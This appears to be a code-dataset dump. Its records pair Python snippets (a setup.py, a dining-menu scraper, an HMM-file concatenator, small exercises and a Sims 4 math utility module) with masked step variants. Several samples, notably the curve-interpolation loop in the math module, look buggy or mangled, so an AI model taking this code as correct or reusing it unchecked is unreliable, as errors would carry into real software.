percentile_contour_values_from_meshz(zi, [1.0 - vmin])[1][0]\n logger.debug(\"Updating `vmin` to percentile equiv: {:.2f}\".format(vmin))\n\n # remove coords where H==0, as ax.tripcolor can't deal with variable alpha :'(\n fltr = (zi != 0) & (zi >= vmin)\n coords = coords[fltr.flatten(), :]\n zi = zi[fltr]\n\n if not contours:\n tri_poly_collection = pcolor(\n *coords.T,\n zi.flatten(),\n cmap=cmap,\n vmin=vmin,\n shading=shading,\n **subkwargs(kwargs, pcolor)\n )\n\n mappable = tri_poly_collection\n else:\n mappable = _add_contours(\n *coords.T,\n zi=zi.flatten(),\n ax=ax,\n contours=contours,\n percentiles=percentiles,\n cmap=cmap,\n vmin=vmin,\n **kwargs\n )\n ax.set_aspect(\"equal\")\n else:\n if not arr.ndim in [0, 1, 2]:\n raise NotImplementedError\n\n if colorbar:\n cbkwargs = kwargs.copy()\n cbkwargs[\"label\"] = cbarlabel\n add_colorbar(mappable, **cbkwargs)\n\n return ax\n\n\ndef _add_contours(\n *coords,\n zi=None,\n ax=None,\n contours=[],\n cmap=DEFAULT_CONT_COLORMAP,\n vmin=0.0,\n extent=None,\n **kwargs\n):\n \"\"\"\n Add density-based contours to a plot.\n \"\"\"\n # get the contour levels\n percentiles = kwargs.pop(\"percentiles\", True)\n levels = contours or kwargs.get(\"levels\", None)\n pcolor, contour, contourf = get_axis_density_methods(ax)\n if percentiles and not isinstance(levels, int):\n # plot individual percentile contours\n _cs = plot_Z_percentiles(\n *coords,\n zi=zi,\n ax=ax,\n percentiles=levels,\n extent=extent,\n cmap=cmap,\n **kwargs\n )\n mappable = _cs\n else:\n # plot interval contours\n if levels is None:\n levels = MaxNLocator(nbins=10).tick_values(zi.min(), zi.max())\n elif isinstance(levels, int):\n levels = MaxNLocator(nbins=levels).tick_values(zi.min(), zi.max())\n else:\n raise NotImplementedError\n # filled contours\n mappable = contourf(\n *coords, zi, extent=extent, levels=levels, cmap=cmap, vmin=vmin, **kwargs\n )\n # contours\n contour(\n *coords, zi, extent=extent, levels=levels, cmap=cmap, vmin=vmin, **kwargs\n )\n return mappable\n\n\n_add_additional_parameters = True\n\ndensity.__doc__ = density.__doc__.format(\n otherparams=[\n \"\",\n get_additional_params(\n density,\n plt.pcolormesh,\n plt.hist2d,\n plt.hexbin,\n plt.contour,\n plt.contourf,\n header=\"Other Parameters\",\n indent=4,\n subsections=True,\n ),\n ][_add_additional_parameters]\n)\n",
"step-ids": [
0,
2,
3,
4,
5
]
}
|
[
0,
2,
3,
4,
5
] |
from setuptools import setup  # setuptools (not distutils) is required for install_requires
setup(name='greeker',
version='0.3.2-git',
description="scrambles nouns in an XML document to produce a specimen for layout testing",
author="Brian Tingle",
author_email="[email protected]",
url="http://tingletech.github.com/greeker.py/",
install_requires=["inflect>=0.2.1", "lxml>=2.3.2", "nltk>=2.0.1rc2-git", "numpy", "argparse"],
py_modules=['greeker'],
scripts=['greeker.py'],
)
|
normal
|
{
"blob_id": "1fda8274024bdf74e7fbd4ac4a27d6cfe6032a13",
"index": 9790,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nsetup(name='greeker', version='0.3.2-git', description=\n 'scrambles nouns in an XML document to produce a specimen for layout testing'\n , author='Brian Tingle', author_email=\n '[email protected]', url=\n 'http://tingletech.github.com/greeker.py/', install_requires=[\n 'inflect>=0.2.1', 'lxml>=2.3.2', 'nltk>=2.0.1rc2-git', 'numpy',\n 'argparse'], py_modules=['greeker'], scripts=['greeker.py'])\n",
"step-3": "from distutils.core import setup\nsetup(name='greeker', version='0.3.2-git', description=\n 'scrambles nouns in an XML document to produce a specimen for layout testing'\n , author='Brian Tingle', author_email=\n '[email protected]', url=\n 'http://tingletech.github.com/greeker.py/', install_requires=[\n 'inflect>=0.2.1', 'lxml>=2.3.2', 'nltk>=2.0.1rc2-git', 'numpy',\n 'argparse'], py_modules=['greeker'], scripts=['greeker.py'])\n",
"step-4": "from distutils.core import setup\nsetup(name='greeker',\n version='0.3.2-git',\n description=\"scrambles nouns in an XML document to produce a specimen for layout testing\",\n author=\"Brian Tingle\",\n author_email=\"[email protected]\",\n url=\"http://tingletech.github.com/greeker.py/\",\n install_requires=[\"inflect>=0.2.1\", \"lxml>=2.3.2\", \"nltk>=2.0.1rc2-git\", \"numpy\", \"argparse\"],\n py_modules=['greeker'],\n scripts=['greeker.py'],\n )\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from BeautifulSoup import BeautifulSoup, NavigableString
from urllib2 import urlopen
from time import ctime
import sys
import os
import re
restaurants = ["http://finweb.rit.edu/diningservices/brickcity",
"http://finweb.rit.edu/diningservices/commons",
"http://finweb.rit.edu/diningservices/crossroads",
"http://finweb.rit.edu/diningservices/gvcantinagrille",
"http://finweb.rit.edu/diningservices/gracies",
"http://finweb.rit.edu/diningservices/ritzsportszone"]
pretty_header = """
---------------------------------------------------
Parser Of On-campus Preferred Specials
a.k.a.
______ ______ ______ ______ _____
| _ | __ | __ | _ |/ ____|
| |_) | | | | | | | |_) | (___
| ___| | | | | | | ___|\___ \\
| | | |__| | |__| | | ____) |
| | | | | | | |
|__| |______|______|__| |_____/
It is currently {curtime}
---------------------------------------------------
[1] Brick City Cafe
[2] Commons
[3] Crossroads
[4] Global Village Cantina and Grille
[5] Gracies
[6] Ritz Sports Zone
[q] Quit
==================================================="""
def menu():
""" Do all the heavy lifting."""
while True:
# Loop till user quits.
sel = 0
while ( sel < 1 or sel > len(restaurants)):
# Input validation
print pretty_header.format(curtime=ctime())
sel = raw_input("Enter your menu choice [1-6 or q]: ")
if sel.lower() == "q":
sys.exit(0)
try:
sel = int(sel)
except:
sel = 0
os.system("clear")
# Load meals from desired restaurant.
html = urlopen(restaurants[sel-1])
soup = BeautifulSoup(html, convertEntities = BeautifulSoup.HTML_ENTITIES)
meals = soup.findAll(id=re.compile("meal_\d"))
tabs = soup.findAll(id=re.compile("tab_\d"))
# get the name of the restaurant, minus the "RIT Dining Services" bs.
print ("\nOn the menu at " + re.sub("^[\w\W]*\s?:\s?", "",
str(soup.title.string)) + " today is:")
meal_num = 0
for meal in meals:
if meal:
# print all meals served + meal name / subrestaurant name
print ("=====================")
print tabs[meal_num].contents[0].string
print ("=====================\n")
meal_num += 1
for item in meal.findAll("li"):
if item.string and str(item.string) != "":
print item.string
print ("\n")
raw_input("Press any key to continue...")
os.system("clear")
if sys.version[0] != "2":
	print "This script uses BeautifulSoup for html parsing."
	print "BeautifulSoup only supports Python 2.x"
	sys.exit(1)
menu()
|
normal
|
{
"blob_id": "02e40e051c19116c9cb3a903e738232dc8f5d026",
"index": 9522,
"step-1": "\nfrom BeautifulSoup import BeautifulSoup, NavigableString\nfrom urllib2 import urlopen\nfrom time import ctime\nimport sys\nimport os\nimport re\nrestaurants = [\"http://finweb.rit.edu/diningservices/brickcity\",\n\"http://finweb.rit.edu/diningservices/commons\",\n\"http://finweb.rit.edu/diningservices/crossroads\",\n\"http://finweb.rit.edu/diningservices/gvcantinagrille\",\n\"http://finweb.rit.edu/diningservices/gracies\",\n\"http://finweb.rit.edu/diningservices/ritzsportszone\"]\n\npretty_header = \"\"\"\n---------------------------------------------------\n Parser Of On-campus Preferred Specials\n a.k.a.\n ______ ______ ______ ______ _____\n | _ | __ | __ | _ |/ ____|\n | |_) | | | | | | | |_) | (___\n | ___| | | | | | | ___|\\___ \\\\\n | | | |__| | |__| | | ____) |\n | | | | | | | |\n |__| |______|______|__| |_____/\n\n\n It is currently {curtime}\n---------------------------------------------------\n[1] Brick City Cafe\n[2] Commons\n[3] Crossroads\n[4] Global Village Cantina and Grille\n[5] Gracies\n[6] Ritz Sports Zone\n[q] Quit\n===================================================\"\"\"\n\ndef menu():\n\t\"\"\" Do all the heavy lifting.\"\"\"\n\twhile True:\n\t\t# Loop till user quits.\n\t\tsel = 0\n\t\twhile ( sel < 1 or sel > len(restaurants)):\n\t\t\t# Input validation\n\t\t\tprint pretty_header.format(curtime=ctime())\n\t\t\tsel = raw_input(\"Enter your menu choice [1-6 or q]: \")\n\t\t\tif sel.lower() == \"q\":\n\t\t\t\tsys.exit(0)\n\t\t\ttry:\n\t\t\t\tsel = int(sel)\n\t\t\texcept:\n\t\t\t\tsel = 0\n\t\t\tos.system(\"clear\")\n\n\t\t# Load meals from desired restaurant.\n\t\thtml = urlopen(restaurants[sel-1])\n\t\tsoup = BeautifulSoup(html, convertEntities = BeautifulSoup.HTML_ENTITIES)\n\t\tmeals = soup.findAll(id=re.compile(\"meal_\\d\"))\n\t\ttabs = soup.findAll(id=re.compile(\"tab_\\d\"))\n\n\t\t# get the name of the restaurant, minus the \"RIT Dining Services\" bs.\n\t\tprint (\"\\nOn the menu at \" + re.sub(\"^[\\w\\W]*\\s?:\\s?\", \"\",\n\t\t\tstr(soup.title.string)) + \" today is:\")\n\t\tmeal_num = 0\n\t\tfor meal in meals:\n\t\t\tif meal:\n\t\t\t\t# print all meals served + meal name / subrestaurant name\n\t\t\t\tprint (\"=====================\")\n\t\t\t\tprint tabs[meal_num].contents[0].string\n\t\t\t\tprint (\"=====================\\n\")\n\t\t\t\tmeal_num += 1\n\t\t\t\tfor item in meal.findAll(\"li\"):\n\t\t\t\t\tif item.string and str(item.string) != \"\":\n\t\t\t\t\t\tprint item.string\n\t\t\t\tprint (\"\\n\")\n\t\traw_input(\"Press any key to continue...\")\n\t\tos.system(\"clear\")\n\nif sys.version[0] != \"2\":\n\tprint \"This script uses BeautifulSoup for html parsing.\"\n\tprint \"BeautifulSoup only supports Python 2.x\"\nmenu()\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
# coding=utf-8
import sys
if len(sys.argv) == 2:
filepath = sys.argv[1]
pRead = open(filepath,'r')#wordlist.txt
pWrite = open("..\\pro\\hmmsdef.mmf",'w')
time = 0
for line in pRead:
if line != '\n':
            line = line[0: len(line) - 1] # strip the trailing \n
if line == "sil ":
line = line[0: len(line) - 1]
print line
everyHmmfilepath = "..\\..\\model\\hmm3\\hmm_" + line + ".hmm"
pHmmRead = open(everyHmmfilepath,'r')
if time == 0:
                pWrite.write(pHmmRead.read()) # read() reads the rest of the file
pWrite.write("\n")
time = 1
else:
for i in range(3):
pHmmRead.readline()
pWrite.write(pHmmRead.read())
pWrite.write("\n")
else:
    print "the number of args must be one"
|
normal
|
{
"blob_id": "9bd6da909baeb859153e3833f0f43d8cbcb66200",
"index": 9324,
"step-1": "# coding=utf-8\nimport sys\nif len(sys.argv) == 2:\n filepath = sys.argv[1]\n pRead = open(filepath,'r')#wordlist.txt\n pWrite = open(\"..\\\\pro\\\\hmmsdef.mmf\",'w')\n time = 0\n for line in pRead:\n if line != '\\n':\n line = line[0: len(line) - 1] #去除最后的\\n\n if line == \"sil \":\n line = line[0: len(line) - 1]\n print line\n everyHmmfilepath = \"..\\\\..\\\\model\\\\hmm3\\\\hmm_\" + line + \".hmm\"\n pHmmRead = open(everyHmmfilepath,'r')\n if time == 0:\n pWrite.write(pHmmRead.read()) # read()读剩余全文\n pWrite.write(\"\\n\")\n time = 1\n else:\n for i in range(3):\n pHmmRead.readline()\n pWrite.write(pHmmRead.read())\n pWrite.write(\"\\n\")\nelse :\n print \"the agres must be one\"",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
import itertools
def odds(upper_limit):
return [i for i in range(1,upper_limit,2)]
def evens(upper_limit):
return [i for i in range(0,upper_limit,2)]
nested = [i**j for i in range(1,10) for j in range(1,4)]
vowels = ['a', 'e', 'i', 'o', 'u']
consonants = [chr(i) for i in range(97,123) if chr(i) not in vowels]
ascii_table = {i:chr(i) for i in itertools.chain(range(65,91), range(97,123))}
ascii_lowercase = {i:chr(i) for i in ascii_table.keys() if chr(i) == chr(i).lower()}
if __name__ == "__main__":
print('odds', odds(12))
print('evens', evens(11))
print('nested', nested)
print('consonants', consonants)
print('ord of vowels', [ord(char) for char in vowels])
|
normal
|
{
"blob_id": "a2e4e4a0c49c319df2adb073b11107d3f520aa6e",
"index": 1883,
"step-1": "<mask token>\n\n\ndef evens(upper_limit):\n return [i for i in range(0, upper_limit, 2)]\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef odds(upper_limit):\n return [i for i in range(1, upper_limit, 2)]\n\n\ndef evens(upper_limit):\n return [i for i in range(0, upper_limit, 2)]\n\n\n<mask token>\nif __name__ == '__main__':\n print('odds', odds(12))\n print('evens', evens(11))\n print('nested', nested)\n print('consonants', consonants)\n print('ord of vowels', [ord(char) for char in vowels])\n",
"step-3": "<mask token>\n\n\ndef odds(upper_limit):\n return [i for i in range(1, upper_limit, 2)]\n\n\ndef evens(upper_limit):\n return [i for i in range(0, upper_limit, 2)]\n\n\nnested = [(i ** j) for i in range(1, 10) for j in range(1, 4)]\nvowels = ['a', 'e', 'i', 'o', 'u']\nconsonants = [chr(i) for i in range(97, 123) if chr(i) not in vowels]\nascii_table = {i: chr(i) for i in itertools.chain(range(65, 91), range(97, \n 123))}\nascii_lowercase = {i: chr(i) for i in ascii_table.keys() if chr(i) == chr(i\n ).lower()}\nif __name__ == '__main__':\n print('odds', odds(12))\n print('evens', evens(11))\n print('nested', nested)\n print('consonants', consonants)\n print('ord of vowels', [ord(char) for char in vowels])\n",
"step-4": "import itertools\n\n\ndef odds(upper_limit):\n return [i for i in range(1, upper_limit, 2)]\n\n\ndef evens(upper_limit):\n return [i for i in range(0, upper_limit, 2)]\n\n\nnested = [(i ** j) for i in range(1, 10) for j in range(1, 4)]\nvowels = ['a', 'e', 'i', 'o', 'u']\nconsonants = [chr(i) for i in range(97, 123) if chr(i) not in vowels]\nascii_table = {i: chr(i) for i in itertools.chain(range(65, 91), range(97, \n 123))}\nascii_lowercase = {i: chr(i) for i in ascii_table.keys() if chr(i) == chr(i\n ).lower()}\nif __name__ == '__main__':\n print('odds', odds(12))\n print('evens', evens(11))\n print('nested', nested)\n print('consonants', consonants)\n print('ord of vowels', [ord(char) for char in vowels])\n",
"step-5": "import itertools\n\ndef odds(upper_limit):\n return [i for i in range(1,upper_limit,2)]\n\ndef evens(upper_limit):\n return [i for i in range(0,upper_limit,2)]\n\nnested = [i**j for i in range(1,10) for j in range(1,4)]\n\nvowels = ['a', 'e', 'i', 'o', 'u']\n\nconsonants = [chr(i) for i in range(97,123) if chr(i) not in vowels]\n\nascii_table = {i:chr(i) for i in itertools.chain(range(65,91), range(97,123))}\n\nascii_lowercase = {i:chr(i) for i in ascii_table.keys() if chr(i) == chr(i).lower()}\n\n\n\nif __name__ == \"__main__\":\n print('odds', odds(12))\n print('evens', evens(11))\n print('nested', nested) \n print('consonants', consonants)\n print('ord of vowels', [ord(char) for char in vowels]) \n \n\n\n",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
N = int(input("ingrese el numero de datos a ingresar "))
SP = 0
SO = 0
CP = 0
for i in range(1,N+1,1):
NUM = int(input("ingrese un numero entero "))
if NUM > 0:
SP += NUM
CP += 1
else:
SO += NUM
PG = (SP+SO)/N
PP = SP/CP if CP > 0 else 0  # avoid division by zero when no positive numbers were entered
print(f"hay { CP } numeros positivos, el promedio general es de { PG } y el promedio de los numeros positivos es de { PP }")
|
normal
|
{
"blob_id": "efc0b8f1c4887810a9c85e34957d664b01c1e92e",
"index": 1453,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor i in range(1, N + 1, 1):\n NUM = int(input('ingrese un numero entero '))\n if NUM > 0:\n SP += NUM\n CP += 1\n else:\n SO += NUM\n<mask token>\nprint(\n f'hay {CP} numeros positivos, el promedio general es de {PG} y el promedio de los numeros positivos es de {PP}'\n )\n",
"step-3": "N = int(input('ingrese el numero de datos a ingresar '))\nSP = 0\nSO = 0\nCP = 0\nfor i in range(1, N + 1, 1):\n NUM = int(input('ingrese un numero entero '))\n if NUM > 0:\n SP += NUM\n CP += 1\n else:\n SO += NUM\nPG = (SP + SO) / N\nPP = SP / CP\nprint(\n f'hay {CP} numeros positivos, el promedio general es de {PG} y el promedio de los numeros positivos es de {PP}'\n )\n",
"step-4": "N = int(input(\"ingrese el numero de datos a ingresar \"))\nSP = 0\nSO = 0\nCP = 0\nfor i in range(1,N+1,1):\n NUM = int(input(\"ingrese un numero entero \"))\n if NUM > 0:\n SP += NUM\n CP += 1\n else:\n SO += NUM\nPG = (SP+SO)/N\nPP = SP/CP\nprint(f\"hay { CP } numeros positivos, el promedio general es de { PG } y el promedio de los numeros positivos es de { PP }\")\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
def test(name,message):
print("用户是:" , name)
print("欢迎消息是:",message)
my_list = ['孙悟空','欢迎来疯狂软件']
test(*my_list)
print('*****')
# ###########################
def foo(name,*nums):
print("name参数:",name)
print("nums参数:",nums)
my_tuple = (1,2,3)
foo('fkit',*my_tuple)
print('********')
foo(*my_tuple)
print('*******')
foo(my_tuple)
#############################
def bar(book,price,desc):
print(book,'这本书的价格是:',price)
print('描述信息是:',desc)
print('********')
my_dict = {'price':89,'book':'疯狂python讲义','desc':'这是一本系统全面的python学习图书'}
bar(**my_dict)
print('*******')
# If called in the form below without reverse parameter collection (** unpacking), it raises an error:
# TypeError: bar() missing 2 required positional arguments: 'price' and 'desc'
bar(my_dict)
|
normal
|
{
"blob_id": "64fb006ea5ff0d101000dd4329b3d957a326ed1a",
"index": 2387,
"step-1": "def test(name, message):\n print('用户是:', name)\n print('欢迎消息是:', message)\n\n\n<mask token>\n",
"step-2": "def test(name, message):\n print('用户是:', name)\n print('欢迎消息是:', message)\n\n\n<mask token>\n\n\ndef foo(name, *nums):\n print('name参数:', name)\n print('nums参数:', nums)\n\n\n<mask token>\n\n\ndef bar(book, price, desc):\n print(book, '这本书的价格是:', price)\n print('描述信息是:', desc)\n\n\n<mask token>\n",
"step-3": "def test(name, message):\n print('用户是:', name)\n print('欢迎消息是:', message)\n\n\n<mask token>\ntest(*my_list)\nprint('*****')\n\n\ndef foo(name, *nums):\n print('name参数:', name)\n print('nums参数:', nums)\n\n\n<mask token>\nfoo('fkit', *my_tuple)\nprint('********')\nfoo(*my_tuple)\nprint('*******')\nfoo(my_tuple)\n\n\ndef bar(book, price, desc):\n print(book, '这本书的价格是:', price)\n print('描述信息是:', desc)\n\n\nprint('********')\n<mask token>\nbar(**my_dict)\nprint('*******')\nbar(my_dict)\n",
"step-4": "def test(name, message):\n print('用户是:', name)\n print('欢迎消息是:', message)\n\n\nmy_list = ['孙悟空', '欢迎来疯狂软件']\ntest(*my_list)\nprint('*****')\n\n\ndef foo(name, *nums):\n print('name参数:', name)\n print('nums参数:', nums)\n\n\nmy_tuple = 1, 2, 3\nfoo('fkit', *my_tuple)\nprint('********')\nfoo(*my_tuple)\nprint('*******')\nfoo(my_tuple)\n\n\ndef bar(book, price, desc):\n print(book, '这本书的价格是:', price)\n print('描述信息是:', desc)\n\n\nprint('********')\nmy_dict = {'price': 89, 'book': '疯狂python讲义', 'desc': '这是一本系统全面的python学习图书'}\nbar(**my_dict)\nprint('*******')\nbar(my_dict)\n",
"step-5": "def test(name,message):\n print(\"用户是:\" , name)\n print(\"欢迎消息是:\",message)\n\nmy_list = ['孙悟空','欢迎来疯狂软件']\ntest(*my_list)\nprint('*****')\n# ###########################\ndef foo(name,*nums):\n print(\"name参数:\",name)\n print(\"nums参数:\",nums)\nmy_tuple = (1,2,3)\n\nfoo('fkit',*my_tuple)\nprint('********')\nfoo(*my_tuple)\nprint('*******')\nfoo(my_tuple)\n#############################\n\ndef bar(book,price,desc):\n print(book,'这本书的价格是:',price)\n print('描述信息是:',desc)\n\nprint('********')\nmy_dict = {'price':89,'book':'疯狂python讲义','desc':'这是一本系统全面的python学习图书'}\nbar(**my_dict)\nprint('*******')\n#如果是下面的调用形式,不采用逆向参数收集将报错\n# TypeError: bar() missing 2 required positional arguments: 'price' and 'desc'\nbar(my_dict)",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
from _math import Vector2, Vector3, Quaternion, Transform, Vector3Immutable, QuaternionImmutable, minimum_distance
from _math import mod_2pi
from math import pi as PI, sqrt, fmod, floor, atan2, acos, asin, ceil, pi, e
import operator
from sims4.repr_utils import standard_repr
import enum
import native.animation
import sims4.hash_util
from singletons import DEFAULT
TWO_PI = PI*2
EPSILON = 1.192092896e-07
QUATERNION_EPSILON = 0.001
MAX_FLOAT = 3.402823466e+38
MAX_UINT64 = 18446744073709551615
MAX_INT64 = 9223372036854775807
MAX_UINT32 = 4294967295
MAX_INT32 = 2147483647
MAX_UINT16 = 65535
MAX_INT16 = 32767
POS_INFINITY = float('inf')
NEG_INFINITY = float('-inf')
FORWARD_AXIS = Vector3.Z_AXIS()
UP_AXIS = Vector3.Y_AXIS()
def clamp(lower_bound, x, upper_bound):
if x < lower_bound:
return lower_bound
if x > upper_bound:
return upper_bound
return x
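# Note: interpolate() weights `a` by `fraction` and `b` by (1 - fraction), so
# fraction=1 returns a and fraction=0 returns b (e.g. interpolate(10, 20, 0.25) == 17.5).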
def interpolate(a, b, fraction):
return a*fraction + (1 - fraction)*b
def linear_seq_gen(start, stop, step, max_count=None):
delta = stop - start
num = floor(abs(delta/step))
if max_count is not None:
num = min(num, max_count - 1)
if num > 0:
for i in range(0, num + 1):
yield start + i*delta/num
else:
yield start
if stop != start:
yield stop
def deg_to_rad(deg):
return deg*PI/180
def rad_to_deg(rad):
return rad*180/PI
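# Smallest absolute separation between two angles, accounting for 2*pi wrap-around:
# e.g. angle_abs_difference(0.1, TWO_PI - 0.1) yields 0.2 rather than TWO_PI - 0.2.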
def angle_abs_difference(a1, a2):
delta = sims4.math.mod_2pi(a1 - a2)
if delta > sims4.math.PI:
delta = sims4.math.TWO_PI - delta
return delta
def vector_dot(a, b):
return a.x*b.x + a.y*b.y + a.z*b.z
def vector_dot_2d(a, b):
return a.x*b.x + a.z*b.z
def vector_cross(a, b):
return Vector3(a.y*b.z - a.z*b.y, a.z*b.x - a.x*b.z, a.x*b.y - a.y*b.x)
def vector_cross_2d(a, b):
return a.z*b.x - a.x*b.z
def vector_normalize(v):
return v/v.magnitude()
def vector_flatten(v):
return Vector3(v.x, 0, v.z)
def almost_equal(a, b, epsilon=EPSILON):
return abs(a - b) < epsilon
def vector3_almost_equal(v1, v2, epsilon=EPSILON):
return abs(v1.x - v2.x) < epsilon and (abs(v1.y - v2.y) < epsilon and abs(v1.z - v2.z) < epsilon)
def vector3_almost_equal_2d(v1, v2, epsilon=EPSILON):
return abs(v1.x - v2.x) < epsilon and abs(v1.z - v2.z) < epsilon
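# q and -q encode the same rotation, so both sign conventions are accepted below.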
def quaternion_almost_equal(q1, q2, epsilon=QUATERNION_EPSILON):
if abs(q1.x - q2.x) < epsilon and (abs(q1.y - q2.y) < epsilon and abs(q1.z - q2.z) < epsilon) and abs(q1.w - q2.w) < epsilon:
return True
if abs(q1.x + q2.x) < epsilon and (abs(q1.y + q2.y) < epsilon and abs(q1.z + q2.z) < epsilon) and abs(q1.w + q2.w) < epsilon:
return True
return False
def transform_almost_equal(t1, t2, epsilon=EPSILON, epsilon_orientation=QUATERNION_EPSILON):
if epsilon_orientation is DEFAULT:
epsilon_orientation = epsilon
return vector3_almost_equal(t1.translation, t2.translation, epsilon=epsilon) and quaternion_almost_equal(t1.orientation, t2.orientation, epsilon=epsilon_orientation)
def transform_almost_equal_2d(t1, t2, epsilon=EPSILON, epsilon_orientation=QUATERNION_EPSILON):
if epsilon_orientation is DEFAULT:
epsilon_orientation = epsilon
return vector3_almost_equal_2d(t1.translation, t2.translation, epsilon=epsilon) and quaternion_almost_equal(t1.orientation, t2.orientation, epsilon=epsilon_orientation)
def vector3_rotate_axis_angle(v, angle, axis):
q = Quaternion.from_axis_angle(angle, axis)
return q.transform_vector(v)
def vector3_angle(v):
return atan2(v.x, v.z)
def angle_to_yaw_quaternion(angle):
return Quaternion.from_axis_angle(angle, UP_AXIS)
def yaw_quaternion_to_angle(q):
if almost_equal(q.y, 0.0):
return 0
angle = acos(q.w)*2.0
if q.y > 0:
return angle
return -angle
def get_closest_point_2D(segment, p):
a1 = segment[0]
a2 = segment[1]
(x1, x2) = (a1.x, a2.x)
x3 = p.x
(z1, z2) = (a1.z, a2.z)
z3 = p.z
dx = x2 - x1
dz = z2 - z1
t = ((x3 - x1)*dx + (z3 - z1)*dz)/(dx*dx + dz*dz)
t = sims4.math.clamp(0, t, 1)
x0 = x1 + t*dx
z0 = z1 + t*dz
return Vector3(x0, p.y, z0)
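# Illustrative usage sketch, assuming the native Vector3 type from _math:
# project a point onto a segment in the XZ plane, keeping the point's own Y.
#   seg = (Vector3(0, 0, 0), Vector3(10, 0, 0))
#   get_closest_point_2D(seg, Vector3(4, 2, 3)) -> Vector3(4, 2, 0)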
def invert_quaternion(q):
d = 1.0/(q.x*q.x + q.y*q.y + q.z*q.z + q.w*q.w)
return Quaternion(-d*q.x, -d*q.y, -d*q.z, d*q.w)
def get_difference_transform(transform_a, transform_b):
v = transform_b.translation - transform_a.translation
a_q_i = invert_quaternion(transform_a.orientation)
q = Quaternion.concatenate(transform_b.orientation, a_q_i)
v_prime = Quaternion.transform_vector(a_q_i, v)
return Transform(v_prime, q)
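# Illustrative note, not in the original source: get_difference_transform
# expresses transform_b relative to transform_a: the offset is rotated into a's
# local frame and the orientation is composed with the inverse of a's rotation.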
class Location:
__qualname__ = 'Location'
__slots__ = ('transform', 'routing_surface', '_parent_ref', 'joint_name_or_hash', 'slot_hash')
def __init__(self, transform, routing_surface, parent=None, joint_name_or_hash=None, slot_hash=0):
self.transform = transform
self.routing_surface = routing_surface
self.parent = parent
self.joint_name_or_hash = joint_name_or_hash
self.slot_hash = slot_hash
def __repr__(self):
return standard_repr(self, self.transform, self.routing_surface, parent=self.parent, joint_name_or_hash=self.joint_name_or_hash, slot_hash=self.slot_hash)
def __eq__(self, other):
if type(self) is not type(other):
return False
if self.transform != other.transform:
return False
if self.parent != other.parent:
return False
if self.routing_surface != other.routing_surface:
return False
slot_hash0 = self.joint_name_or_hash or self.slot_hash
slot_hash1 = other.joint_name_or_hash or other.slot_hash
if slot_hash0 != slot_hash1:
return False
return True
def __ne__(self, other):
return not self.__eq__(other)
@property
def parent(self):
if self._parent_ref is not None:
return self._parent_ref()
@parent.setter
def parent(self, value):
if value is not None:
self._parent_ref = value.ref()
self.routing_surface = None
else:
self._parent_ref = None
@property
def joint_name_hash(self):
if self.joint_name_or_hash is None:
return 0
if isinstance(self.joint_name_or_hash, int):
return self.joint_name_or_hash
return sims4.hash_util.hash32(self.joint_name_or_hash)
@property
def world_routing_surface(self):
if self.parent is not None:
return self.parent.location.world_routing_surface
return self.routing_surface
@property
def zone_id(self):
if self.world_routing_surface.type == 1:
return self.world_routing_surface.primary_id
return sims4.zone_utils.get_zone_id()
@property
def level(self):
return self.world_routing_surface.secondary_id
@property
def world_transform(self):
if self.parent is None:
return self.transform
transform = self.transform
parent = self.parent
if parent.is_part:
parent_transform = parent.part_owner.transform
else:
parent_transform = parent.transform
if self.joint_name_or_hash is None:
if transform is None:
return parent_transform
return sims4.math.Transform.concatenate(transform, parent_transform)
joint_transform = native.animation.get_joint_transform_from_rig(self.parent.rig, self.joint_name_or_hash)
if transform is None:
return sims4.math.Transform.concatenate(joint_transform, parent_transform)
local_transform = sims4.math.Transform.concatenate(transform, joint_transform)
return sims4.math.Transform.concatenate(local_transform, parent_transform)
def duplicate(self):
return type(self)(self.transform, self.routing_surface, self.parent, self.joint_name_or_hash, self.slot_hash)
def clone(self, *, transform=DEFAULT, translation=DEFAULT, orientation=DEFAULT, routing_surface=DEFAULT, parent=DEFAULT, joint_name_or_hash=DEFAULT, slot_hash=DEFAULT):
if transform is DEFAULT:
transform = self.transform
if transform is not None:
if translation is DEFAULT:
translation = transform.translation
if orientation is DEFAULT:
orientation = transform.orientation
transform = Transform(translation, orientation)
if routing_surface is DEFAULT:
routing_surface = self.routing_surface
if parent is DEFAULT:
parent = self.parent
if joint_name_or_hash is DEFAULT:
joint_name_or_hash = self.joint_name_or_hash
if slot_hash is DEFAULT:
slot_hash = self.slot_hash
return type(self)(transform, routing_surface, parent, joint_name_or_hash, slot_hash)
class LinearCurve:
__qualname__ = 'LinearCurve'
__slots__ = ('points',)
def __init__(self, points):
self.points = points
self.points.sort(key=lambda i: i[0])
def get(self, val):
p_max = len(self.points) - 1
if val <= self.points[0][0]:
return self.points[0][1]
if val >= self.points[p_max][0]:
return self.points[p_max][1]
        # Walk back to the segment whose left endpoint is <= val, then interpolate linearly.
        i = p_max - 1
        while i > 0 and val < self.points[i][0]:
            i -= 1
        p1 = self.points[i]
        p2 = self.points[i + 1]
        percent = (val - p1[0])/(p2[0] - p1[0])
        return (p2[1] - p1[1])*percent + p1[1]
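# Illustrative usage sketch, not part of the original module: LinearCurve does
# piecewise-linear interpolation over sorted (x, y) control points and clamps
# to the endpoint values outside the covered range.
#   curve = LinearCurve([(0, 0), (10, 100)])
#   curve.get(-5) -> 0
#   curve.get(5)  -> 50.0
#   curve.get(20) -> 100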
class WeightedUtilityCurve(LinearCurve):
__qualname__ = 'WeightedUtilityCurve'
def __init__(self, points, max_y=0, weight=1):
if max_y == 0:
max_y = self._find_largest_y(points)
transformed_points = [(point[0], point[1]/max_y*weight) for point in points]
super().__init__(transformed_points)
def _find_largest_y(self, points):
max_y = 0
        for point in points:
            if point[1] > max_y:
                max_y = point[1]
return max_y
class CircularUtilityCurve(LinearCurve):
__qualname__ = 'CircularUtilityCurve'
def __init__(self, points, min_x, max_x):
super().__init__(points)
self._min_x = min_x
self._max_x = max_x
last_point = self.points[-1]
